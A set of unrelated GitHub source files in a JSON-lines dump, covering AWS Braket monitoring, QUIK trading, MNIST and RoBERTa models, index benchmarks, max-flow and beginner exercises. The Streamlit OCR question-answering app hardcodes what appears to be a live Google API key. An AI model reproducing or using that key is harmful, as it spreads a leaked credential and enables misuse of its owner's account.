bucket_name:\n for task_id in task_info_each_status[0][\"id\"][bucket_name]:\n deleted_result.append(\n clients[\n device_region_index_dict[device_provider]\n ].delete_quantumTask(task_id)[\"quantumTaskArn\"]\n )\n return deleted_result\n\n\ndef send_email(lambda_output, TOPIC_ARN):\n client = boto3.client(\"sns\")\n msg = str(lambda_output)\n subject: str = \"Braket Monitor\"\n client.publish(TopicArn=TOPIC_ARN, Message=msg, Subject=subject)\n\n\ndef post_slack(lambda_output, slack_post_url, event):\n\n # settings\n method = \"POST\"\n\n # message contents\n now = datetime.now()\n current_time = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n operation_message = (\n \"*# Task Information*\"\n + \" \"\n + current_time\n + \"\\n\"\n + \"*- triggered event: *\\n\"\n + \"status: \"\n + str(event[\"detail\"][\"status\"])\n + \", \"\n + \"deviceArn: \"\n + str(event[\"detail\"][\"deviceArn\"])\n + \", \"\n + \"shots: \"\n + str(event[\"detail\"][\"shots\"])\n + \"\\n\"\n )\n\n detail_info = str(lambda_output)\n\n message = (\n operation_message\n + \"\\n\"\n + \"*- Total task information for a specific device:*\\n\"\n + detail_info\n + \"\\n\"\n )\n send_data = {\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": message,\n },\n }\n ],\n }\n\n send_text = (\"payload=\" + json.dumps(send_data)).encode(\"utf-8\")\n\n request = urllib.request.Request(slack_post_url, data=send_text, method=method)\n with urllib.request.urlopen(request) as response:\n response_body = response.read().decode(\"utf-8\")\n\n return response_body\n","repo_name":"Qulacs-Osaka/Amazon_Braket_Monitoring_Tools","sub_path":"src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
{"seq_id":"32764133230","text":"import asyncio\nfrom aioquiklua import QuikLuaClientBase, QuikLuaException, QuikLuaConnectionException, QuikLuaNoHistoryException\nimport traceback\nimport time\n\n\nasync def main():\n \"\"\"\n Example code for retrieving parameters\n \"\"\"\n\n qclient = QuikLuaClientBase(\"tcp://localhost:5560\", # RPC socket\n None, # PUB socket\n socket_timeout=100, # Socket timeout after which an error is raised (in milliseconds)\n n_simultaneous_sockets=5, # Number of simultaneously open sockets\n history_backfill_interval_sec=10, # Timeout for waiting on history (in seconds) (usually takes under 1 sec)\n cache_min_update_sec=0.2, # How long cached quote history stays fresh after the last update\n verbosity=3, # Enable debugging information (higher values log more)\n # logger=logging.getLogger('testlog') # A custom logger can be supplied\n )\n\n try:\n # Call initialize() on the base class to set up internal variables\n await qclient.initialize()\n\n # Just check the connection\n await qclient.heartbeat()\n\n # Try watching the current parameters of all FORTS futures\n all_classes = await qclient.rpc_call('getClassSecurities', class_code='SPBFUT')\n all_securities = all_classes['class_securities'].split(',')\n\n #\n # Parameter keys may be in any case, but all keys are later converted to lower case\n #\n for _sec_code in all_securities:\n if _sec_code:\n await qclient.params_subscribe('SPBFUT',\n _sec_code,\n [0.5, 0.5, 0.5, 10, 1, 10], # An update interval can be set per parameter, in seconds\n ['bid', 'offer', 'last', 'MAT_DATE', 'time', 'STEPPRICET'])\n\n print(f'Press ctrl+c to stop')\n 
while True:\n # Press ctrl+c to stop\n #\n # During trading-session hours the parameter values should keep updating\n #\n\n params = qclient.params_get('SPBFUT', 'RIH1')\n # Note: all parameter keys are converted to lower case\n print(f\"Params 'SPBFUT', 'RIH1': {params}\")\n\n # heartbeat() also checks whether the parameter-update task raised an exception;\n # it is useful to run it periodically but not too often, every 5-10 seconds is about right\n await qclient.heartbeat()\n\n await asyncio.sleep(5)\n except asyncio.CancelledError:\n # AsyncIO valid stop\n raise\n except KeyboardInterrupt:\n print('KeyboardInterrupt')\n except:\n print(traceback.format_exc())\n finally:\n # Finish up (ALWAYS call shutdown(), especially if you requested quote history!)\n await qclient.shutdown()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"alexveden/quik-lua-async-client-python","sub_path":"examples/sample_params_benchmark.py","file_name":"sample_params_benchmark.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
{"seq_id":"19397950768","text":"import pytesseract\nfrom PIL import Image\nimport google.generativeai as palm\nfrom docx import Document\nfrom docx.enum.text import WD_BREAK\n# import docx2pdf\nimport streamlit as st\nimport time\nimport subprocess\n\ndocx_file = \"QnA_AI.docx\"\npdf_file = \"QnA_AI.pdf\"\nfolder_path = 'img_data/'\n#files_path = \"C:/Users/shaik/OneDrive/Desktop/Pyweek2023/extraprojects/\"\n\n\n\n# def docx_to_pdf(docx_file, pdf_file):\n# cmd = ['libreoffice', '--convert-to', 'pdf', docx_file, '--outdir', pdf_file]\n# subprocess.run(cmd)\n\n\n\ndef perform_ocr(image_path):\n try:\n img = Image.open(image_path)\n text = pytesseract.image_to_string(img)\n return text\n except Exception as e:\n return str(e)\n\n\ndef get_answers(question_text):\n try:\n palm.configure(api_key='AIzaSyDYTiHCkpFbjNB28PKKgCkhi-kpchwv8GA') # Replace with your API key\n\n palm_prompt = \"\"\"\n You are a language model that provides correct and detailed answers to questions with examples in order. Put the question number then mention the question explicitly and then in the next line \"Ans: \" and Answer.\n Output format:\n . \n \n\n sample output:\n 1. What is the name of the capital of India?\n Ans: New Delhi\n\n (two new lines space for next question)\n\n 2. Explain the concept of inheritance in OOP?\n Ans: Inheritance is the process by which one class takes the properties of another class. The class that inherits the properties of another class is called the derived class or child class. 
The class whose properties are inherited is called the base class or parent class.\n \"\"\" \n\n response = palm.chat(messages=palm_prompt+question_text)\n\n # Last contains the model's response:\n answer = response.last\n return answer\n except Exception as e:\n return str(e)\n\n\ndef create_document(questions, answers):\n doc = Document()\n doc.add_heading('Question and Answers Document', 0)\n doc.add_paragraph(answers)\n docx_file = \"QnA_AI.docx\"\n pdf_file = \"QnA_AI.pdf\"\n doc.save(docx_file)\n #display this docx file in streamlit\n with open('QnA_AI.docx', 'rb') as f:\n st.download_button('Download Docx with Answers', f, file_name='QnA_AI.docx')\n\n\ndef main():\n st.title(\"AI Assistant\")\n st.write(\"Take a pic of a Question Paper (previous years obv) and upload here: \")\n # run = st.button('Run', key='button1')\n # capture = st.button('Capture', key='button2')\n # FRAME_WINDOW = st.image([])\n # camera = cv2.VideoCapture(0)\n # while run:\n # _, frame = camera.read()\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # FRAME_WINDOW.image(frame)\n # if capture:\n # cv2.imwrite('cap.jpg', frame)\n # break\n # camera.release()\n img = st.file_uploader(\"Choose an image\", type=[\"jpg\", \"jpeg\", \"png\"])\n time.sleep(2)\n if img is not None:\n image = Image.open(img)\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n print(type(image))\n image.save('img_data/capture.png')\n \n timestamp = int(time.time())\n file_extension = image.format.lower()\n file_path = f'{folder_path}{timestamp}.{file_extension}'\n image.save(file_path)\n else:\n image = Image.open('img_data/default.png')\n image.save('img_data/capture.png')\n \n\n #wait for 2 seconds\n print(\"waiting..\")\n # time.sleep(2)\n print(\"woke\")\n # Step 1: Perform OCR\n question_text = perform_ocr('img_data/capture.png')\n print(question_text)\n st.subheader(\"Scroll down to Download the AI Generated QnA docx file.\")\n st.write(\"\\nPDF version coming soon In Sha' Allah 😉\\n\")\n #st.write(\"Scroll down to Download the AI Generated QnA docx file. 
(PDF version coming soon In Sha' Allah 😉)\")\n st.write(\"\\n\\nThe questions detected are: \\n\\n\", question_text)\n\n print(\"--------------------------\")\n # Step 2: Get answers\n print(\"Getting answers...\")\n st.subheader(\"Generating answers...\")\n answers = get_answers(question_text)\n print(answers)\n st.write(\"\\n\\nThe Answers generated are: \\n\", answers)\n print(\"--------------------------\")\n # Step 3: Create a Word document\n create_document(question_text, answers)\n print(\"Document created: QnA_AI.docx\")\n\n print(\"converting to pdf\")\n #docx_to_pdf(docx_file, pdf_file)\n #docx2pdf.convert(docx_file, pdf_file)\n #print full path\n print(\"pdf created: \", pdf_file)\n\nif __name__ == '__main__':\n main()","repo_name":"shaikamirgh/Question-Papers-AI","sub_path":"ST_Camera_QnA_main.py","file_name":"ST_Camera_QnA_main.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35816524563","text":"from time import time\nfrom hash_index import create_hash_table\nfrom btree_index import create_tree\nfrom utils import KeyValue\nimport random\nfrom utils.test_performace import test_by_index, test_by_size, compare_methods\nfrom utils.test_filter_performance import compare_methods as compare_filters\nfrom naive_search import NaiveSearch\nfrom naive_filter import NaiveFilter\nfrom bitmap_index.BitMap import BitMap\n\n\ndef create_test_set(N=10000):\n result = []\n for i in range(0, N):\n kv = KeyValue(i, random.randint(0, N))\n result.append(kv)\n return result\n\n\ndef odd_predicate(obj):\n return hash(obj) >> 10 > 15\n\ntest_set = create_test_set(100000)\n\n\nnaive_search = NaiveSearch()\nhash_map = create_hash_table(10)\nprint('First method is hash map index. And the second one is naive search')\ncompare_methods(hash_map, naive_search, test_set)\nprint()\n\nnaive_search = NaiveSearch()\nbtree = create_tree(10)\nprint('The first method is Btree index. And the second one is naive search')\ncompare_methods(btree, naive_search, test_set)\n\nprint()\nhash_map = create_hash_table(10)\nbtree = create_tree(10)\nprint('The first method is Btree index. And the second one is hash map index')\ncompare_methods(btree, hash_map, test_set)\n\nprint()\n# btree = create_tree(3)\n#\n#\n# res = test_by_size(test_set, 100, btree)\n#\n# for i in range(0, len(res)):\n# print('%d %f' % (i, res[i]))\nnaive_search = NaiveFilter(odd_predicate)\nbit_map = BitMap(odd_predicate)\nprint('The first method is bit map index. 
And the second one is naive filter')\ncompare_filters(bit_map, naive_search, test_set)\n\n\n# for t in test_set:\n# btree.add(t)\n#\n# for t in test_set:\n# btree.search(t.key)\n\n\n\n# naive_search = NaiveSearch()\n#\n# compare_methods(btree, naive_search, test_set)\n\n","repo_name":"Valt25/dropIDx","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34652801067","text":"# coding=utf-8\n\nfrom flask_restplus import Api\nfrom settings import SWAGGER_UI_ENABLED, FLASK_DEBUG\n\n## Swagger documentation\nswagger_docs = '/'\nif not SWAGGER_UI_ENABLED:\n swagger_docs = False\n\n## API Instance\napi = Api(version='1.0',\n title='Japanese to Romaji API',\n description='Converts Kanji, Katakana and Hiragana texts to romanized text.',\n doc=swagger_docs,\n catch_all_404s=True)\n\n\n","repo_name":"nilportugues/japanese-to-romaji-experiment","sub_path":"api/resources/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34588203312","text":"import unittest\n\nfrom pysolcrypto.accumulator import accumulate, witness, ismember\nfrom pysolcrypto.altbn128 import randsn\n\n\nclass AccumulatorTests(unittest.TestCase):\n def test_witness(self):\n secret = randsn()\n items = list(range(1, 10))\n my_item = items[3]\n AkX = accumulate(items, secret)\n W_x = witness(AkX, my_item, secret)\n self.assertTrue(ismember(AkX, my_item, W_x, secret))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"HarryR/solcrypto","sub_path":"test/test_accumulator.py","file_name":"test_accumulator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":268,"dataset":"github-code","pt":"21"}
{"seq_id":"16601488642","text":"import pandas as pd\n\n# define the column names up front (to avoid column-name errors later)\ncolumn = ['순위', '영화명', '개봉일', '매출액', '매출액', '매출액증감', '매출액증감율', '누적매출액', '관객수',\n '관객수증감', '관객수증감율', '누적관객수', '스크린수', '상영횟수', '대표국적', '국적', '배급사']\n\n# create an initialized DataFrame to accumulate the per-file DataFrames\ndf_res = pd.DataFrame([\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n], columns = column)\n\n# nested loops over year and week: read the matching csv file and append it to the DataFrame\nfor year in range(2019, 2022):\n if year == 2019:\n for week in range(1,50,4):\n week_str = str(week)\n\n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n \n elif year == 2020:\n for week in range(1,54,4):\n week_str = str(week)\n \n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n \n else: \n for week in range(3,24,4):\n week_str = str(week)\n \n df = pd.read_csv('C:/202105_lab/09.ELKStack/JJJJ_Project/Movie_CSV/weekly/'+str(year)+'_'+week_str+'.csv')\n df1 = df.rename(columns=df.iloc[0])\n df_res = pd.concat([df_res, df1])\n\n# drop the unneeded columns from the accumulated df_res DataFrame\ndf_res.drop([df_res.columns[1],df_res.columns[2],\n df_res.columns[6], df_res.columns[7], df_res.columns[10],\n df_res.columns[11], df_res.columns[12], df_res.columns[13],\n df_res.columns[14], df_res.columns[15], df_res.columns[16]], axis=1, inplace = True)\n\n# keep only the rows that hold totals ('합계') in df_res\ndf_tot = df_res[df_res['순위'] == '합계']\n\n# rename the columns of df_tot\ndf_tot.columns = ['순위', 
'매출액', '매출점유율', '매출액증감', '관객수', '관객수증감']\ndf_tot.drop(['순위', '매출점유율'], axis=1, inplace=True)\n\n#매출액과 관객수의 데이터들에서 특수문자 제거 및 실수형으로 변환\ndf_tot[\"매출액\"] = df_tot[\"매출액\"].str.replace(pat=r'[^\\w]', repl=r'', regex=True)\ndf_tot[\"관객수\"] = df_tot[\"관객수\"].str.replace(pat=r'[^\\w]', repl=r'', regex=True)\ndf_tot = df_tot.astype({'매출액': 'float'})\ndf_tot = df_tot.astype({'관객수': 'float'})\n\ndf_tot.reset_index(inplace=True)\ndf_tot.drop([df_tot.columns[0]], axis=1, inplace= True)\n\n#매출액과 관객수를 백만단위로 변환\ndf_tot['매출액'] = df_tot['매출액'] / 1000000\ndf_tot['관객수'] = df_tot['관객수'] / 1000000\n\n\n#매출액에 넣어줄 시리즈 생성\nser1 = pd.Series(df_tot['매출액'])\n\n#매출액 차이를 통해 매출액 변동사항 계산 및 새로운 시리즈에 저장\nlst = [0]\nfor idx in range(1, len(ser1)):\n lst.append((ser1[idx] - ser1[idx-1])/df_tot['매출액'][idx])\n ser2 = pd.Series(lst)\n\n#매출액 증감 열에 위에서 만든 시리즈 대입\ndf_tot['매출액증감'] = ser2\n\n#매출액과 유사하게 관객수 계산\nser3 = pd.Series(df_tot['관객수'])\nlst = [0]\nfor idx in range(1, len(ser3)):\n lst.append((ser3[idx] - ser3[idx-1])/df_tot['관객수'][idx])\n ser4 = pd.Series(lst)\n \ndf_tot['관객수증감'] = ser4\n\n\n#연도와 주차를 넣어줄 리스트 값을 생성 후 변환하여 df-tot의 연도주차 열에 대입하는 과정\nlst = []\nfor year in range(2019, 2022):\n if year == 2019:\n for week in range(1,53):\n yt_week = str(year)+'_'+str(week)\n lst.append(yt_week)\n elif year == 2020:\n for week in range(1,54):\n yt_week = str(year)+'_'+str(week) \n lst.append(yt_week)\n else:\n for week in range(1,27):\n yt_week = str(year)+'_'+str(week)\n lst.append(yt_week)\nser_yr_wekk = pd.Series(lst)\n\ndf_tot['연도주차'] = ser_yr_wekk\n\n\n#정제한 데이터프레임을 weekly_total.csv로 저장\ndf_tot.to_csv(\"./Movie_CSV/weekly_total.csv\", index=False)","repo_name":"dlwlsdudo1/JJJJ_Project","sub_path":"Python/week_movie_csv_transform.py","file_name":"week_movie_csv_transform.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8677908111","text":"lista1=[5,8,3,7,2,4,6,1]\r\nlista2=[True]\r\n\r\ndef funkcija():\r\n for i in range(1, len(lista1)):\r\n if lista1[i] > lista1[i-1]:\r\n lista2.append(True)\r\n else:\r\n lista2.append(False)\r\n \r\nfunkcija()\r\nprint(lista1)\r\nprint(lista2)","repo_name":"aljinovic-ante/Introduction_to_Programming","sub_path":"Vjezba 11/vje11zad3.py","file_name":"vje11zad3.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"bs","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40373823034","text":"# program is an example of building and training a neural network (Artificial Neural Network or ANN) for digit recognition using the MNIST dataset\n\n\nimport tensorflow # for neural network\nfrom tensorflow import keras # keras for high-level neural network APIs\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense,Flatten\n\n# load the MNIST dataset:\n\n# It consists of 28x28 pixel grayscale images of handwritten digits (0-9) for training and testing.\n\n(X_train,Y_train),(X_test,Y_test) =keras.datasets.mnist.load_data()\nprint(X_train) # X_train and X_test are NumPy arrays containing the pixel values of images.\nprint(X_test.shape) # TELLS HOW MANY ROWS\nprint(Y_train) # Each element in Y_train represents the true digit label (0-9) for the corresponding image in X_train.\n\n# Tells which image is in particular column\nimport matplotlib.pyplot as plt\nplt.imshow(X_train[0]) # is used to display an image, and X_train[0] is the first image in the training dataset.\nplt.show() # this will show the image at particular coloumn\n\n# 
# Scale pixel values from the 0-255 range down to the 0-1 range\n\nX_train = X_train/255 # Dividing each pixel value by 255 scales the pixel values from the original range of 0-255 to a new range of 0-1\nX_test = X_test/255 # When pixel values are in the 0-1 range, it can be easier for the neural network to learn and converge because it avoids issues related to large input values.\nprint(X_test[0])\n\n#ANN\n\nmodel=Sequential() # creating an empty neural network model with no layers.\n# Sequential Model: A sequential model is a linear stack of layers that are executed in a sequential order, one after the other. It is a straightforward way to build a neural network where data flows sequentially from one layer to the next.\n# we need 784 input values, but the data comes as 28*28 images, so we flatten the data first\n\n\n# Flatten Layer: The layer being added is the \"Flatten\" layer. It's used to convert multi-dimensional input data into a one-dimensional vector.\n# model.add(...): This line adds a new layer to the neural network model.\n# one-dimensional array of 28*28 = 784 values.\nmodel.add(Flatten(input_shape=(28,28))) # converts each 28x28 image from its 2-D form into a flat 1-D vector\n\n# Dense Layer: The Dense layer is a standard fully connected layer in a neural network. Each neuron in a dense layer is connected to every neuron in the previous layer, making it fully connected.\n\nmodel.add(Dense(128,activation='relu')) # first hidden layer with 128 neurons\n\nmodel.add(Dense(32,activation='relu')) # second hidden layer\n\n# the output layer with 10 neurons and softmax activation is designed for multi-class classification. The neural network will compute class probabilities for each of the 10 possible digits (0-9), and the class with the highest probability will be considered the predicted digit when making predictions.\n\nmodel.add(Dense(10,activation='softmax')) # output layer with 10 neurons (digits 0-9)\n\nprint(model.summary())\n\n\n# code is related to training a neural network for digit recognition using the MNIST dataset.\n\n# compile() configures the model for training before fitting it.\n# The sparse_categorical_crossentropy loss is commonly used for multi-class classification problems where the target labels are integers (e.g., 0, 1, 2) rather than one-hot encoded vectors.\nmodel.compile(loss='sparse_categorical_crossentropy',optimizer='Adam',metrics=['accuracy'])\n\n\n# training\n# After the model is trained, the history object will contain information about how the model's performance changed during training, such as training loss, validation loss, and other metrics.\nhistory = model.fit(X_train,Y_train,epochs=10,validation_split=0.2)\n\ny_prob = model.predict(X_test) # generates predictions (probabilities or scores) for a set of input data (X_test) and stores those predictions in the variable y_prob\ny_pred = y_prob.argmax(axis=1) # converts the predicted probabilities (y_prob) into predicted class labels by selecting the class with the highest probability for each input example\nfrom sklearn.metrics import accuracy_score\naccuracy_score(Y_test,y_pred) # The result of accuracy_score(Y_test, y_pred) is a single accuracy score, typically ranging from 0 to 1, where 1 represents perfect accuracy (all predictions are correct), and lower values indicate less accurate predictions\nplt.plot(history.history['loss']) # It helps you understand whether the model is converging (reducing loss) or if 
there are signs of overfitting (increasing loss on the validation set).\n# loss-> It quantifies the difference between the model's predictions and the actual target values\nplt.show()\nplt.plot(history.history['val_loss']) # The validation loss is a crucial metric during the training of machine learning models, especially deep neural networks. It provides insight into how well the model generalizes to data that it has not seen during training.\nplt.show()\nplt.plot(history.history['accuracy']) # This code is used to plot the accuracy (classification accuracy) during the training of a classification machine learning model.\nplt.show()\nplt.plot(history.history['val_accuracy']) # This code is used to plot the validation accuracy during the training of a classification machine learning model\nplt.show()\nplt.imshow(X_test[4]) # displays 5th image of dataset\nplt.show()\nprint(model.predict(X_test[4].reshape(1,28,28)).argmax(axis=1)) # It accesses the fifth element","repo_name":"OnlyPooja/digit-recognition","sub_path":"digit recognition using ann.py","file_name":"digit recognition using ann.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86506593688","text":"import torch\nfrom transformers import RobertaTokenizer, RobertaModel, RobertaConfig\nfrom transformers.modeling_roberta import RobertaForSequenceClassification, RobertaClassificationHead\n\nfrom experiment.bert_utils import BertWrapperModel\nfrom experiment.qa.model import BaseModel\nfrom torch import nn\n\nclass RobertaSigmoid(BaseModel):\n _MODEL = RobertaModel\n\n def __init__(self, from_pretrained, model_name=None, cache_dir=None, config=None, num_labels=1):\n super(RobertaSigmoid, self).__init__(from_pretrained, model_name=model_name, cache_dir=cache_dir, config=config)\n assert num_labels == 1\n self.num_labels = num_labels\n self.dropout = nn.Dropout(self.config.hidden_dropout_prob)\n self.lin_layer = nn.Linear(self.config.hidden_size, num_labels)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, position_ids=None, head_mask=None, tasks=None):\n # we set the token type ids to zero\n # -> https://github.com/huggingface/transformers/issues/1443#issuecomment-581019419\n encoded_layers, pooled_output = self.bert(\n input_ids, token_type_ids=token_type_ids * 0.0, attention_mask=attention_mask, position_ids=None,\n head_mask=head_mask\n )[:2]\n\n # sent_encoding = pooled_output\n sent_encoding = encoded_layers[:, 0, :]\n # sent_encoding = self.dropout(sent_encoding)\n sent_encoding = self.lin_layer(sent_encoding)\n return self.sigmoid(sent_encoding)\n\n\n\nclass RobertaSigmoidModel(BertWrapperModel):\n _MODEL_CLASS = RobertaSigmoid\n _TOKENIZER_CLASS = RobertaTokenizer\n _CONFIG_CLASS = RobertaConfig\n\n\ncomponent = RobertaSigmoidModel\n","repo_name":"UKPLab/emnlp2020-multicqa","sub_path":"bert-ranker/experiment/qa_pointwise/model/roberta_sigmoid.py","file_name":"roberta_sigmoid.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"23110454821","text":"import numpy as np\n\n\nclass Data(object):\n \"\"\" Class to handle loading and processing of raw datasets \"\"\"\n def __init__(self, x, y, alphabet, input_size, n_classes):\n self.x = x\n self.y = y\n self.alphabet = alphabet\n self.alphabet_size = len(alphabet)\n self.length = input_size\n self.n_classes = n_classes\n 
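        # self.data caches the raw (label, text) samples; self.dict maps each alphabet character to a 1-based index, leaving 0 for characters outside the alphabet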
self.data = None\n self.dict = {}\n for i, ch in enumerate(alphabet):\n self.dict[ch] = i + 1\n\n def load_data(self):\n self.data = np.array(list(zip(self.y, self.x)))\n\n def get_all_data(self):\n \"\"\"\n\n :return: (ndarray) data transformed from raw to indexed form with associated one-hot label\n \"\"\"\n data_size = len(self.data)\n start_index = 0\n end_index = data_size\n batch_texts = self.data[start_index:end_index]\n batch_indices = []\n one_hot = np.eye(self.n_classes, dtype='int64')\n classes = []\n for c, s in batch_texts:\n batch_indices.append(self.str_to_indices(s))\n c = int(c) - 1\n classes.append(one_hot[c])\n\n return np.asarray(batch_indices, dtype='int64'), np.asarray(classes)\n\n def str_to_indices(self, s):\n \"\"\"\n Convert a string to character indices based on character dictionary.\n :param s: (str) string to be converted\n :return: (ndarray) indices of characters in s\n \"\"\"\n s = s.lower()\n max_length = min(len(s), self.length)\n str2idx = np.zeros(self.length, dtype='int64')\n for i in range(1, max_length + 1):\n c = s[-i]\n if c in self.dict:\n str2idx[i - 1] = self.dict[c]\n\n return str2idx\n","repo_name":"markmo/dltemplate","sub_path":"src/text_classification_benchmarks/char_cnn/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"43701931388","text":"import math\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport os\r\n\r\nvert = 0\r\nV = []\r\nedges = []\r\n\r\nfor f in os.listdir('.'):\r\n if f.endswith('.png'):\r\n os.remove(f) \r\n\r\ndef add_edge(i, j, cap):\r\n global V\r\n global edges\r\n \r\n if i != j and V[i][j] == 0 and V[j][i] == 0:\r\n V[i][j] = cap\r\n edges.append([i, j])\r\n\r\ndef rand_v(size, edges_per_vertex):\r\n global V\r\n global vert\r\n global edges\r\n \r\n vert = size\r\n V = [[0 for j in range(vert)] for i in range(vert)]\r\n\r\n for _ in range(vert*edges_per_vertex):\r\n i = random.randint(0,vert-2)\r\n j = random.randint(i+1, vert-1)\r\n add_edge(i, j, random.randint(1,20))\r\n \r\n for i in range(vert):\r\n inputs = 0\r\n outputs = 0\r\n for j in range(vert):\r\n if V[i][j] != 0: outputs += 1\r\n if V[j][i] != 0: inputs += 1\r\n if outputs != 0 and inputs == 0:\r\n add_edge(0, i, random.randint(1,20))\r\n if inputs != 0 and outputs == 0:\r\n add_edge(i, vert-1, random.randint(1,20))\r\n\r\ndef file_v(name):\r\n global V\r\n global vert\r\n global edges\r\n\r\n file = open(name, 'r')\r\n vert = int(file.readline().strip())\r\n V = [[0 for j in range(vert)] for i in range(vert)]\r\n for line in file:\r\n x = line[:len(line)-1].split()\r\n i = int(x[0]) # row\r\n j = int(x[1]) # column\r\n cap = int(x[2]) # weight\r\n V[i][j] = cap\r\n V[j][i] = 0\r\n edges.append([i,j])\r\n\r\n file.close()\r\n\r\nfile_v('edges1.txt')\r\n# file_v('edges2.txt')\r\n# rand_v(6, 2)\r\n\r\nimnum = 0\r\ndef print_graph():\r\n global imnum\r\n global V\r\n global edges\r\n G = nx.DiGraph(directed=True)\r\n\r\n for i in range(vert):\r\n G.add_node(str(i))\r\n for x in edges:\r\n G.add_edges_from([(str(x[0]), str(x[1]), {'capacity': str(V[x[0]][x[1]])+'/'+str(V[x[0]][x[1]]+V[x[1]][x[0]])})])\r\n\r\n pos = nx.spring_layout(G, seed=18, iterations=500)\r\n nx.draw_networkx_nodes(G, pos, node_color='lightblue', node_size=500)\r\n nx.draw_networkx_edges(G, pos, edge_color='grey')\r\n nx.draw_networkx_labels(G, pos, font_size=12, font_family='sans-serif')\r\n 
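    # each edge label reads remaining/total capacity: V[i][j] shrinks as flow is pushed, while V[j][i] accumulates the pushed flow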
nx.draw_networkx_edge_labels(\r\n G, pos, edge_labels={(u, v): d['capacity'] for u, v, d in G.edges(data=True)}\r\n )\r\n plt.axis('off')\r\n plt.savefig(f'{imnum}.png')\r\n imnum += 1\r\n\r\ndef find_flows(V):\r\n global vert\r\n\r\n source_id = 0\r\n sink_id = vert-1\r\n\r\n max_flows = 0\r\n while True:\r\n print_graph()\r\n current_id = source_id\r\n path = [(math.inf, -1, source_id)]\r\n visited = {source_id}\r\n\r\n while current_id != sink_id:\r\n max_cap = 0\r\n next_id = -1\r\n for j in range(vert):\r\n if j in visited:\r\n continue\r\n if max_cap < V[current_id][j]:\r\n max_cap = V[current_id][j]\r\n next_id = j\r\n\r\n if next_id == -1:\r\n if current_id == source_id:\r\n return max_flows\r\n current_id = path.pop()[1]\r\n else:\r\n path.append((max_cap, current_id, next_id))\r\n visited.add(next_id)\r\n current_id = next_id\r\n \r\n flow = min([x[0] for x in path])\r\n max_flows += flow\r\n print(f'Flow {flow} along the path: {[x[2] for x in path]}')\r\n\r\n for p in path:\r\n i, j = p[1], p[2]\r\n if i == -1:\r\n continue\r\n V[i][j] -= flow\r\n V[j][i] += flow\r\n\r\nprint(f'The maximum flow is: {find_flows(V)}')\r\n","repo_name":"q2p/lapki","sub_path":"kuznetsov/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10789471945","text":"fruit = ['apple', 'orange', 'manggo']\nfruit = ['orange', 'apple', 'manggo']\n\nfor x in range(len(fruit)):\n print(x,fruit[x])\n\nfor x in fruit:\n print(x)\n\n\nstudent={\n \"name\":\"ana\",\n \"age\":13,\n }\nstudent={\n \"age\":13,\n \"name\":[\"ana\"],\n}\nstudent['name'].append('anna')\nprint(student)\n\nfor x,y in student.items():\n print(x,y)\n\n\nfruit = [\n ['apple', 'orange', 'manggo'],\n ['papaya', 'cherry', 'banana'],\n ['melon', 'watermelon']\n]\n\n\nfor x in fruit:\n for y in x :\n print(y)\n\nfor x in fruit:\n if 'apple' in x :\n print('yes')\n else:\n print('no') \n\n\nstudents={\n \"student1\":{\n \"name\":\"ana\",\n \"age\":13,\n },\n \"student2\":{\n \"name\":\"ani\",\n \"age\":14,\n },\n \"student3\":{\n \"name\":\"ane\",\n \"age\":15,\n }\n}\n\n\nfor y in students:\n for x in students[y]:\n print(students[y][x])\n\nfor student in students.items():\n print(student)","repo_name":"hamdiranu/backUp_Alta","sub_path":"Alta Batch 4/Phase 1/Week 1/Day 5/Materi/DS/looping.py","file_name":"looping.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24414991763","text":"import pygame\nimport text_to_speech_goog_ai ## good\nimport os\n\n\ndef text_send_to_server():\n \n \n create_text = 